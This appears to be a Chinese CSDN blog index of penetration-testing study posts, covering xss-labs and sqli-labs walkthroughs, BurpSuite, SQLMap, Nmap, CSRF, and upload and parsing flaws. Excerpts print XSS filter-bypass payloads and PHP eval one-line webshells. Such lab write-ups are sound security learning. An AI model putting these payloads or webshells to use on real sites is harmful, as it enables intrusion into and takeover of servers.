three_years_-CSDN博客

原创 xss-labs-master 第十六关到第二十关通关

xss-labs-master 第一关到第五关通关xss-labs-master 第六关到第十关通关xss-labs-master 第十一关到第十五关通关Level 16进入十六关发现在URL中有个keyword参数，值为test，而在图片的上面也出现了一个test尝试修改它，并且查看网页源代码发现script关键字被替换成了空格，但是on关键字没有被替换当写入图片标签的时候，发现"/"也被替换成了空格构造的语句为level16.php?keyword=%3Cimg%0Dsrc=x%0Don

2020-10-07 16:23:59 906

原创 xss-labs-master 第十一关到第十五关通关

xss-labs-master 第一关到第五关通关xss-labs-master 第六关到第十关通关Level 11进入十一关发现与第十关相似，所以直接查看网页源代码发现比第十关多了个隐藏域，看到名称就想起了HTTP请求中的Referer头，所以使用BurpSuite抓一下包查看一下发现并没有Refeer头把拦截到的请求包发送到Repeater模块中，然后自己添加一个Referer头上去，可以看到响应中的t_ref中的值为script Onon，也就是说大小于号都被过滤了，接着使用第十题的解

2020-10-06 16:04:19 1520

原创 xss-labs-master 第六关到第十关通关

要想看前面的五关请看xss-labs-master 第一关到第五关通关Level 6进入题目废话不多说，上来就是一个test测试一下会不会变化可以看到提示信息有输入的内容，昨天我想了一个可以看到JS变化的代码，话不多说直接上(<script Onon>)通过查看网页源代码，可以知道script、on等关键字会在中间加一个下画线，但是大写的关键字就不会，所以此题应该就是可以使用大小绕过绕过语句为"><scRipt>alert(/XSS/)</script>

2020-10-05 15:42:25 654

原创 xss-labs-master 第一关到第五关通关

下面不废话直接开始我们的xss之旅Level1进入第一个关首先发现URL中有个name=test，并且有欢迎用户test，所以我们尝试修改一下可以看到是成功变化了的，我们这里就直接上JS的弹框语句一回车就显示了弹框，点击确定就可以进入下一关了Level2一进入第二关就发现URL中有一个keyword=test，并且在输入框中也有一个test，接着尝试修改它看看URL中的会不会变化可以看到当我输入knight的时候，在URL中keyword的值也变成了knight，所以URL的值就是输入框中

2020-10-03 11:27:41 1037

原创 sqli-labs 第一关到第五关通关

本文是基于docker搭建sqli-labs，不知道怎么搭建的话请看Linux安装docker和配置sqli-labsLess-01从题目的提示我们可以知道题目需要我们传递一个id的值，我们传递一个1进行尝试可以看到显示了登录用户名和密码，接着我们对其进行判断是字符型注入还是数字型注入经过尝试我们得到报错信息，可以得知这一题是字符型注入，使用单引号进行闭合，我们再进行对传递的参数后面的语句进行注释这里使用的是–+进行注释，接着使用order by判断列数经过尝试，得到列数为三列，接下来我们就可

2020-10-02 11:10:20 490

原创 XMAPP安装与WordPress的搭建

XMAPP介绍XAMPP（Apache+MySQL+PHP+PERL）是一个功能强大的建站集成软件包。这个软件包原来的名字是 LAMPP，但是为了避免误解，最新的几个版本就改名为 XAMPP 了。它可以在Windows、Linux、Solaris、Mac OS X 等多种操作系统下安装使用，支持多语言：英文、简体中文、繁体中文、韩文、俄文、日文等。XMAPP安装1、去官网下载XMAPP软件包，选择与自己电脑合适的版本进行下载，如果觉得官网下得慢的话，可以在评论联系我提供网盘下载链接2、打开Win

2020-06-17 11:30:20 749 1

原创 SQLMap常用脚本学习篇

SQLMap基础SQLMap基础学习SQLMap常用脚本SQLMap的脚本都存放在安装目录的tamper文件夹中脚本名称作用说明apostrophemask.py将引号替换成UTF-8，用于过滤单引号base64encode.py替换成base64编码multiplespaces.py围绕SQL关键字添加多个空格space2plus.py用+号代替空格nonrecursivereplacement.py作为双重查询语句，用双重语句替换预定义的SQ

2020-06-13 19:33:07 1326

原创 SQLMap基础学习篇

SQLMap介绍SQLMap是一个自动化的SQL注入工具，其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞，内置了很多的插件，其强大的功能包括数据库指纹识别、数据库枚举、数据提取、访问目标文件系统，并在获取完全的操作权限时实施任意命令SQLMap的安装安装的话在这里就不进行演示，不会装的话可以在博客首页搜索一下安装教程，这里只演示一下参数的使用，本次演示都是以本地虚拟机搭建的sqli-labs环境为例SQLMap的基本参数1、-u：该参数后要进行检测的URL注：如果URL为一个的话可

2020-06-10 19:12:32 303

原创 BurpSuite之Project Options模块学习篇

BurpSuite介绍BurpSuite介绍Project Options模块该模块主要用来对Project的做设置的，它拥有五个小的模块组成，下面将一一介绍这些模块Connection主要设置连接的设置，下面一一介绍Connection中的版块Platform Authentication平台验证Upstream Proxy Servers上游代理服务器SOCKS ProxySOCKS代理Timeouts超时Hostname Resolution主机名解析，可以手动添

2020-06-05 19:37:51 766

原创 BurpSuite之Extender模块学习篇

BurpSuite介绍BurpSuite介绍Extender模块该模块提供了支持第三方扩展插件我的功能，可以编写自己的自定义插件或者从插件商店中安装扩展插件，本文中将以SQLMap为例进行安装注：由于SQLMap是由Python进行编写的，所以安装之前需要安装好Python环境和配置好环境变量，由于我已经安装好，还要下载一个关于sqlmap的jar包，该文件会在文章的末尾附加链接,在这就不演示安装步骤：第一步：点击add按钮进行添加第二步：选择Java，然后点击Select File按

2020-06-03 19:13:56 808

原创 BurpSuite之Decoder、Comparer模块学习篇

BurpSuite介绍 BurpSuite介绍Decoder模块该模块主要用于对数据进行加解密，这里以SQL注入常用的’ and 1=1#进行URL编码为例Comparer模块该模块主要用于比较两个数据包或者两次扫描保存的文件对比，可以找出两个的不同之处下面以DVWA靶机登录的正确和错误的数据包进行对比当我们把两个拦截到的数据包发送到Comparer模块后，选中两个不同的数据包后点击Words按钮开始进行对比完成对比之后我们就可以看一下两个数据包之间的不同了，不同的地方会有特殊的颜色进行

2020-06-01 19:24:57 438

原创 BurpSuite之Sequencer模块学习

BurpSuite介绍BurpSuite介绍Sequencer模块该模块的作用是用来测试应用程序的session tokens或其他重要数据项，该模块主要由三个小模块组成，分别是Live capture 信息截取Select Live Capture Request选择实时捕获请求Token Location Within Response选择令牌在响应中的位置Live Capture Options实时捕获的设置选项Manual load 手动加载设置手动加载，可以使用以获取的

2020-05-30 19:47:34 887

原创 BurpSuite之Intruder模块学习篇

BurpSuite介绍BurpSuite介绍Intruder模块该模块重要用于完成对Web应用程序自动化攻击，也就是我们经常说的爆破下面我们以爆破DVWA靶机的暴力破解页面来介绍该模块的一个个版块进行演示之前我们先进去把登录密码给换了开启代理启动代理抓包，把抓到的登录数据包右键发送到Intruder这样我们就可以在我们的Intruder模块看到我们发送的数据包了Target版块该板块会自动识别我们的URL的IP和端口Positions版块这个版块就是显示我们从代理拦截到的数

2020-05-28 21:28:44 711

原创 BurpSuite之Repeater模块学习篇

BurpSuite介绍之前的文章已经介绍过了，请观看BurpSuite学习的第一篇文章Repeater模块该模块是一个可以手动修改并重发请求的模块，可以分析拦截到的请求的具体响应信息我们这里用DVWA靶机的登录界面来演示介绍该模块首先通过代理拦截到登录的数据包,右键把它发送到Repeater中，也可以通过快捷键或者点击Action按钮进行发送这样就可以在Repeater的左边看到我们的请求数据包了，这样我们就能在这边进行修改请求等一系列的操作了我们点击GO按钮可以把拦截的请求包发送给服务器了

2020-05-25 19:49:04 2740 1

原创 BurpSuite之Scanner模块学习篇

BurpSuite介绍有关BurpSuite的介绍在之前就说过了，想看的话可以去Burp Suite之Target模块学习篇学习下面我们进入我们今天学习的模块Scanner模块该模块的主要功能是用来自动检测Web系统的漏洞，我们可以使用这个模块代替我们手工去对系统进行普通漏洞类型的渗透测试，让我们把精力放在一些必须要人工去验证的漏洞下面使用该模块对DVWA靶机进行扫描为例，一一介绍该模块中的各小版块的功能第一步先将浏览器设置为代理模式，并且BurpSuite中关闭拦截功能，使数据包从B

2020-05-22 20:47:33 1323

原创 BurpSuite之Spider模块学习篇

BurpSuite介绍有关介绍请看有关BurpSuite学习的第一篇文章BurpSuite之Target模块学习篇Spider模块Spider翻译为蜘蛛，所以这个模块就是我们所说的爬虫模块，主要用于爬取网站的每个页面的内容，并生成完整的网站地图下面我们以虚拟机搭建的sqli-labs网站进行扫描，一一介绍Spider模块下的各版块之间的作用首先开启我们的虚拟机，然后我们的浏览器开启代理模式，BurpSuite开启代理但是关闭拦截功能，我们使用浏览器对我们的网站进行访问，可以看到我们我们网站刚开

2020-05-20 19:52:43 767

原创 Burp Suite之Proxy模块学习篇

BurpSuite介绍关于BurpSuite介绍在上篇的学习中已经介绍过了，这里不再介绍，想看的请浏览linkProxy模块该模块的的主要功能是拦截、查看、修改所有客户端和服务器端之间传输的数据下面将一一介绍Proxy下的各小模块Intercept模块Forward：将拦截到的请求包放行，让它继续发送到服务器Drop：将拦截到的请求包丢弃，不然它到达服务器Intercept is on/off：开启或关闭代理拦截功能Action：将拦截的请求包发送到其他模块进行使用下面介绍拦截到的

2020-05-19 20:20:45 531

原创 Linux安装docker和配置sqli-labs

此次安装选用的是CentOS 7系统安装docker第一步:使用uname -r查看系统内核第二步:使用yum install docker命令进行安装docker第三步:使用systemctl enable docker命令将docker设置为开机启动第四步:使用service docker start命令启动docker服务配置sqli-labs第一步:使用docker search sqli-labs命令查找sqli-labs镜像第二步:使用docker pull

2020-05-18 15:08:33 1292

原创 Burp Suite之Target模块学习篇

BurpSuite介绍BurpSuite是用于攻击web应用程序的集合平台。它包含了许多工具，并为这些工具设计了很多接口，以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP消息，持久性，认证，代理，日志，警报的一个强大的可扩展的框架BurpSuite安装我安装的版本为1.7.37(破解版本)，由于BurpSuite基于Java写的，所以需要先安装Java的环境，Java安装教程和BurpSuite安装教程都可以在百度进行搜索查看，这里就不演示了，破解过程在安装的过程一般都会有，但是

2020-05-17 19:51:07 1105

原创 Nmap高级使用学习篇

脚本介绍Nmap的脚本默认早安装目录下的scripts文件夹中Nmap的脚本主要分为以下的类型1.Auth负责处理鉴权证书的脚本2.Broadcast在局域网内探查更多服务的开启情况3.Brute针对常见的应用提供暴力破解方式4.Default使用-sC或-A选项扫描时默认脚本，提供基本的脚本扫描嫩婚礼5.Discovery对网络进行更多信息的收集6.Dos用于进行拒绝服务攻击7.Exploit利用已知的漏洞入侵系统8.External利用第三方的数据库或资源9.Fuz

2020-05-15 17:22:30 246

原创 Nmap基础使用学习篇

Nmap介绍全程为Network Mapper(网络映射器)，是一款开源代码的网络探测和安全审核工具。它被设计用来快速扫描大型网络，包括主机探测与发现、开放的端口情况、操作系统与应用服务指纹识别、WAF识别及常见安全漏洞。图形界面为Zenmap，分布式框架为DNmapNmap的功能主机探测探测网络上的主机端口扫描扫描目标主机上所开放的端口版本探测探测目标主机的网络服务，判断其服务名称及版本号系统检测探测目标主机的操作系统及网络设备的硬件特性支持探测脚本的编写使用Nmap的脚

2020-05-12 19:33:22 264

原创 CSRF漏洞学习篇

CSRF介绍CSRF全程为Cross-site request forgery，中文名为跨站请求伪造，通常缩写为CSRF或者XSRF，是一种对网站的恶意利用CSRF漏洞的原理攻击者利用目标用户的身份，以目标用户的名义执行某种非法的操作CSRF的危害以目标的名义发送邮件、发信息、盗取目标用户的账号、个人信息等CSRF攻击过程的重点1.目标用户已经登录了网站，能够执行网站的功能2.目标用户访问了攻击者构造的URL演示以DVWA靶机为实验机做实验进入这个页面使用默认的账号和密码登录进

2020-05-10 17:49:46 256

原创 Nginx解析漏洞学习篇

原理由于配置的问题导致".php"结尾的文件交给了FastCGI处理，但是FastCGI在处理该".php"文件的时候没有找到该文件，就会找上一层目录，例如文件为"xxx.jpg/xx.php"就会找到xxx.jpg对其用php的格式进行解析，所以造成了解析漏洞演示首先在图片中插入一句话这里用phpinfo()函数演示把该图片上传到服务器上直接复制该图片的路劲，访问该路径就好了可以看到...

2020-05-07 21:52:52 223

原创 IIS6.0解析漏洞学习篇

IIS解析漏洞目录解析漏洞(IIS6.0)：在IIS6.0的网站目录中创建有*.asp形式的目录，该文件夹下的所有文件都会以asp脚本格式进行解析下面以Windows Server2003搭建的环境演示：在网站的主目录下新建一个a.asp文件夹在该文件下新建一个test.txt文件，输入hello word！我们在本地可以看到网页中输出了hello word!，接下来把asp格式的一句话...

2020-05-05 17:30:19 908

原创文件包含漏洞学习篇

原理在开发中，程序人员一般会把重复使用的函数写到单个的文件中，需要使用的时候就会直接调用此文件，无需再进行重复的编写，这个调用文件的过程一般就称之为文件包含。文件包含相关函数：include()、include_once()、require()、require_once()漏洞产生原因通过函数调用文件的时候，由于对包含的文件没有进行有效的过滤处理，就有可能被攻击者利用从而导致了Web目录...

2020-05-03 19:53:25 132

原创文件上传漏洞学习篇

文件上传漏洞在现代互联网的Web应用中，上传文件是一种常见的功能，用为它可以提高业务的效率，比如很多的网课学习系统，允许用户上传头像、视频、图片、文档等许多类型的文件。一旦Web应用向用户提供的功能越多其受到攻击的风险就会越大，如果一个Web应用中存在文件上传漏洞，那么有些居心不良的用户就可以利用这个漏洞将可执行的脚本程序上传到服务器中，获取网站的权限，从而可以进一步获取整个服务器的权限，甚至可...

2020-05-01 23:12:35 300

原创一句话木马学习篇

一、常用的一句话PHP格式<?php @eval($_POST[cmd]);?><?php @eval($_REQUEST[cmd]);?>ASP格式<?php @eval($_POST[cmd]);?><?php @eval($_REQUEST[cmd]);?>JSP格式<%if(request.getParameter(“...

2020-04-29 19:58:14 1022

原创 XSS漏洞学习篇

1.XSS定义XSS又称之为"跨站脚本攻击"，是指攻击者往Web页面中插入恶意的JavaScript代码，当用户浏览带有攻击者插入恶意代码的页面时，里面的JavaScript代码就会被执行，从而达到攻击者想要的目的。XSS漏洞一直在OWASP TOP10的排名中位列前茅的地位。2.XSS危害窃取账号或Cookie、窃取个人信息、网站挂马、发送广告等等3.XSS分类3.1反射型XSS...

2020-04-26 19:38:04 494

原创 SQL注入

什么是SQL注入SQL注入是是指Web应用程序对用户输入数据的合法性合法性没有进行判断，就把输入的数据传递到后端并带入数据库进行查询，导致攻击者可以对数据库进行任意操作。常见的SQL注入：报错注入、盲注、Union注入、Boolean注入等SQL注入产生的原理SQL注入漏洞产生需要满足两个条件：1.参数用户可控：前端传给后端的参数是由用户控制的2.参数带入数据库查询：用户输入的参数会...

2020-04-24 17:53:51 310

原创常见的Web容器

1. ApacheApache HTTP Server（简称Apache）是Apache软件基金会的一个开放源码的网页服务器，是目前世界上使用最广泛的一种web server，它以跨平台，高效和稳定而闻名，可以运行在几乎所有广泛使用的计算机平台上。Apache的特点是简单、速度快、性能稳定，并可做代理服务器来使用。Apache是用C语言开发的基于模块化设计的web应用，总体上看起来代码的可读性...

2020-04-22 13:59:41 3295

原创常用数据库

1. Access全名：Microsoft Office AccessAccess 是微软公司推出的基于Windows的桌面关系数据库管理系统（RDBMS，即Relational Database Management System），是Office系列应用软件之一。它提供了表、查询、窗体、报表、页、宏、模块7种用来建立数据库系统的对象；提供了多种向导、生成器、模板，把数据存储、数据查询、界面...

2020-04-19 22:51:12 425

原创常用的端口信息

1.文件共享服务端口端口号端口说明21/22/69Ftp/Tftp文件传输协议2049NFS服务139Samba服务389Ldap目录访问服务2.远程连接服务端口端口号端口说明22SSH远程连接23Telnet远程连接3389Rdp远程桌面连接5900VNC5632PyAnyWhere服务...

2020-04-17 15:13:22 138

原创渗透测试学习一

渗透测试之信息收集进行渗透测试之前最重要的一步就是信息收集，在这个阶段我们要尽可能的收集关于目标的信息，最重要的就是收集服务器的配置信息和网站的敏感信息，其中就包括了域名和子域名信息、目标网站系统、CMS指纹、目标网站的真实IP、开放的端口等等，也就是说只要是与网站相关的信息，都要尽量的收集。1.收集域名信息拿到目标的域名之后，要做的第一件事就是要获取域名的注册信息，包括域名的DNS服务器信...

2020-04-16 21:47:22 302

three_year的博客